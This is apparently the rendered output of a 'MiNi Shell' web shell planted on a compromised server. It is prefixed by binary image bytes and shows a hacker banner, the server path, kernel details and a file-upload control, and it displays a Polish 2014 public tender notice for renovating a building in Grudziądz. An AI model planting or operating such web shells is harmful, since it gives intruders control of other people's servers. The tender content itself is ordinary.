JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140324/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140324/61877-N-2014.html

<p class="kh_header"><b>Grudziądz: Odnowa zdegradowanego wielorodzinnego budynku mieszkalnego Wspólnoty Mieszkaniowej przy ul. Mickiewicza 5 w Grudziądzu, współfinansowanego ze  środków Europejskiego Funduszu Rozwoju Regionalnego  w ramach Regionalnego Programu Operacyjnego  Województwa Kujawsko-Pomorskiego na lata 2007-2013  oraz ze środków budżetu państwa.</b><br>
<b>Numer ogłoszenia: 61877 - 2014; data zamieszczenia: 24.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Gospodarki Nieruchomościami Sp. z o.o. w Grudziądzu , ul. Mickiewicza 23, 86-300 Grudziądz, woj. kujawsko-pomorskie, tel. 056 4512034.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpgn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odnowa zdegradowanego wielorodzinnego budynku mieszkalnego Wspólnoty Mieszkaniowej przy ul. Mickiewicza 5 w Grudziądzu, współfinansowanego ze  środków Europejskiego Funduszu Rozwoju Regionalnego  w ramach Regionalnego Programu Operacyjnego  Województwa Kujawsko-Pomorskiego na lata 2007-2013  oraz ze środków budżetu państwa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych: Remont budynku mieszkalnego dla zadania pn. Odnowa zdegradowanego wielorodzinnego budynku mieszkalnego Wspólnoty Mieszkaniowej przy ul. Mickiewicza 5 w Grudziądzu. 
w ramach realizacji projektu współfinansowanego z Europejskiego Funduszu Rozwoju Regionalnego Programu Operacyjnego województwa Kujawsko - Pomorskiego na lata2007 - 2013 oraz ze środków budżetu państwa.
1)Orientacyjny zakres prac:
-Osuszanie budynku metodą grawomagnetokinetyczną, np. metodą firmy AQAPOL lub równoważną
-Przemurowanie kominów ponad dachem z cegły pełnej, założenie czapek kominowych, wykonanie nowych tynków oraz  malowanie farbą elewacyjną,
-Remont dachu z wymianą pokrycia, w tym: wymiana pokrycia dachu z papy asfaltowej na papę termozgrzewalną, wymiana deskowania, oczyszczenie i impregnacja konstrukcji drewnianej w kolorze brąz, nad częścią mieszkalną wymiana izolacji termicznej z wełny mineralnej, wymiana wyłazów oraz innych elementów znajdujących się w dachu, wymiana obróbek blacharskich z blachy cynk-tytanowej gr.0,6 mm. wymiana rynien i rur spustowych
-Remont ścian i stropu poddasza: rozbiórka starej podłogi z desek, usunięcie polep, wykonanie izolacji termicznej z wełny mineralnej, wykonanie nowej podłogi z desek gr. 32 mm, skucie luźnych tynków i uzupełnienie ubytków w tynkach, przetarcie istniejących tynków i malowanie farbą wapienną, widoczną konstrukcję drewnianą dachu oczyścić szczotkami stalowymi i pomalować preparatem olejowym,
-Remont elewacji frontowej, od strony podwórka i ściany szczytowe:  naprawa zniszczonych detali architektonicznych /gzymsy profilowane, opaski, attyki/, wykonanie iniekcji bezciśnieniowej, uzupełnienie i naprawa zwietrzałego tynku 
w technologii Atlas Złoty Wiek wraz z  dwukrotnym malowaniem systemową farbą sylikatową, wymiana parapetów z blachy stalowej na parapety z blachy cynk-tytanowej gr.0,6 mm, demontaż, naprawa  lub wymiana drobnych elementów znajdujących się w elewacjach (haki, uchwyty do flag, drzwiczki rewizyjne, skrzynki gazowe i elektryczne)
-Remont balkonu i balustrad:  naprawa płyty i balustrady stalowej, naprawa detali architektonicznych, naprawa krawędzi i spodu płyty w technologii Atlas Złoty Wiek 
z zachowaniem istniejących wzorów oraz dwukrotne malowanie farbą sylikatową, wykonanie na płycie balkonu izolacji przeciwwodnej oraz posadzki z zaprawy cementowej, wykonanie obróbek blacharskich z blachy cynkowo-tytanowej	
-Remont tarasów z wymianą balustrad:  rozbiórka balustrad stalowo-żelbetowych, rozbiórka i odtworzenie żelbetowych płyt tarasu I piętra, remont lub wymiana belek stalowych z dwuteownika, montaż nowych balustrad stalowych, naprawa krawędzi 
i spodu płyty tarasów parteru, wykończenie krawędzi i spodów płyt tarasów w technologii Atlas Złoty Wiek wraz malowaniem farbą sylikatową, wymiana obróbek blacharskich z blachy cynkowo-tytanowej, na płytach tarasu ułożenie izolacji przeciwwodnej oraz posadzki z płytek antypoślizgowych typu gres.
-Wymiana stolarki okiennej: okna drewniane z zachowaniem historycznych profili 
i podziałów wraz z parapetami wewnętrznymi, okna wyposażone w nawiewniki higrosterowalne w kolorze ościeżnicy, Istniejące witryny sklepowe zachowane w dobrym stanie technicznym do malowania
-Wymiana stolarki drzwiowej drewnianej:  Częściowa wymiana drzwi wejściowych do budynku oraz drzwi wewnętrznych z zachowaniem istniejących profili i podziałów. Drzwi wewnętrzne zachowane w dobrym stanie do renowacji z wymianą uszkodzonych elementów i akcesoriów,	
-Wymiana istniejących zadaszeń nad wejściami do mieszkań: demontaż istniejących daszków i montaż nowych daszków systemowych, łukowych z poliwęglanu na wspornikach stalowych przymocowanych do ścian
-Remont klatki schodowej: podwyższenie istniejącej balustrady stalowej, ułożenie okładziny schodów i podestów z płytek typu gres, uzupełnienie ubytków w tynkach, przecieranie istniejących tynków na ścianach i sufitach malowanie lamperii oraz elementów drewnianych i stalowych farbą olejna, malowanie sufitów i ścian powyżej lamperii farbami emulsyjnymi
-Roboty elektryczne: częściowa wymiana instalacji oświetlenia klatki schodowej oraz instalacji dzwonkowej, przewody elektryczne biegnące na elewacji i w klatkach schodowych na tynku do przełożenia i ułożenia  pod tynkiem w bruzdach,
-Remont schodów zewnętrznych: skucie zniszczonych okładzin z płytek i ułożenie nowych okładzin granitowych gr. 5cm na stopnicach i gr. 3cm na podstopnicach, przy każdym wejściu do lokalu zamontować balustradę z rur stalowych, malowanych proszkowo,
-Remont stropu nad piwnicą: oczyszczenie nawierzchni stropu, przesmarowanie roztworem asfaltowym i ułożenie izolacji z papy termozgrzewalnej SBS na włókninie poliestrowej, ułożenie warstwy spadkowej i nawierzchni z betonu C20/25. Istniejący mur przy stropie naprawić w technologii Atlas Złoty Wiek wraz malowaniem farbą sylikatowąi podwyższyć osadzając balustradę stalową malowaną proszkowo. 
-Remont elewacji frontowej przy wejściu głównym: ściana pomiędzy budynkami: naprawa zniszczonych detali architektonicznych /gzymsy profilowane, opaski, attyki profilowane/, uzupełnienie i naprawa zwietrzałego tynku w technologii Atlas Złoty Wiek wraz z dwukrotnym malowaniem systemową farbą sylikatową, wymiana obróbek z blachy stalowej na obróbki z blachy cynk-tytanowej gr.0,6 mm, demontaż, naprawa lub wymiana drobnych elementów znajdujących się w elewacjach (haki, uchwyty, itp,).
-Remont murów zewnętrznych A,B: rozbiórka i ponowne murowanie ścian z cegły ceramicznej, wykonanie tynków w technologii Atlas Złoty Wiek wraz z dwukrotnym malowaniem systemową farbą sylikatową, uzupełnienie obróbek z blachy cynk-tytanowej gr.0,6 mm,
-Remont budynku gospodarczego: wymiana konstrukcji drewnianej dachu z pokryciem papą termozgrzewalną, założenie obróbek z blachy cynkowo-tytanowej, naprawa ścian wraz z wykonaniem tynków wewnętrznych i zewnętrznych, wymiana stolarki okiennej i drzwiowej, wymiana posadzki, 
-Przebudowa schodów i balustrad ceglanych:; przemurowanie stopni i balustrad z cegły ceram. pełnej, wykonanie nakryw betonowych na balustradzie, wykonanie tynków i malowanie balustrady w technologii Atlas Złoty Wiek,
-Remont podwórka w poziomie piwnic z odwodnieniem: rozbiórka istniejącej nawierzchni z kamienia polnego,  ułożenie rur deszczowych w wykopie z włączeniem do istniejącej kanalizacji deszczowej, zasypanie wykopu i ułożenie nowej nawierzchni z kamienia polnego,
-Remont podwórka w poziomie parteru z odwodnieniem: rozbiórka zniszczonej nawierzchni, oczyszczenie płyty stropowej, przesmarowanie roztworem asfaltowymi, ułożenie izolacji z papy termozgrzewalnej SBS na włókninie poliestrowej, ułożenie warstwy spadkowej i nawierzchni z betonu C20/25,
-Wymiana instalacji elektrycznych w częściach wspólnych: demontaż starej instalacji oświetlenia klatki schodowej i piwnic, wykonanie instalacji oświetlenia klatek schodowych lampami typu Led z wbudowanym źródłem światła, wykonanie instalacji oświetlenia ganków piwnicznych i piwnic lokatorskich z zastosowaniem obniżonego napięcia (24V) z oprawami kanałowymi, wykonanie modernizacji rozdzielni transformatora obniżającego napięcie, budowa systemu domofonów z zastosowaniem domofonu  cyfrowego z unifonami w mieszkaniach i dwoma panelami sterującymi (jeden w bramie wejściowej, drugi w drzwiach do budynku,  z brelokami do poszczególnych mieszkań).	
2)Szczegółowy zakres przedmiotu zamówienia określa projekt budowlano - wykonawczy, specyfikacja techniczna wykonania i odbioru robót oraz przedmiary robót jako elementy pomocnicze na bazie, których należy opracować kosztorysy ofertowe metodą uroszczoną, które należy załączyć do oferty..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.13.40-4, 45.45.30.00-7, 45.00.00.00-7, 45.26.12.10-9, 45.31.00.00-3, 45.42.11.12-2, 45.42.11.11-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości:  15 000,00 zł 
słownie: piętnaście tysięcy złotych  00/100   

Wadium może być wnoszone w jednej lub kilku następujących formach:

1)pieniądzu;
2)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)gwarancjach bankowych;
4)gwarancjach ubezpieczeniowych;
5)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (DZ.U. z 2007r. Nr 42, poz. 275). 

Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: 
Bank:   BGŻ   S.A. O/Grudziądz 
Nr rachunku:  85 2030 0045 1110 0000 0297 0170</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykonanie w okresie ostatnich 5 lat (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) co najmniej 2 robót ogólnobudowlanych o wartości brutto minimum 300 000,00 zł każda, z uwzględnieniem remontu elewacji z czego co najmniej jedna winna być ze zdobieniami architektonicznymi</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia wymogów dotyczących dysponowania odpowiednim potencjałem technicznym</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek dysponowania osobami zdolnymi do wykonania zamówienia  za spełniony, jeśli Wykonawca wykaże osoby posiadające kwalifikacje zawodowe, doświadczenie i uprawnienia w rozumieniu ustawy z dnia 7 lipca 1994r. -Prawo budowalne na stanowisku:
-kierownik robót budowlanych, który musi posiadać uprawnienia do kierowania robotami  budowlanymi w specjalności konstrukcyjno - budowlanej,
-kierownik robót elektrycznych, który musi posiadać uprawnienia budowlane 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych 
i elektroenergetycznych</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 300 000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mpgn.grudziadz.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Gospodarki Nieruchomościami Sp. z o.o., ul. Mickiewicza 23, 86-300 Grudziądz, wejście A pokój Nr 4 - Biuro zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.04.2014 godzina 11:00, miejsce: Miejskie Przedsiębiorstwo Gospodarki Nieruchomościami Sp. z o.o., ul. Mickiewicza 23, 86-300 Grudziądz, wejście A - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego  Województwa Kujawsko-Pomorskiego na lata 2007-2013 oraz ze środków budżetu państwa.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com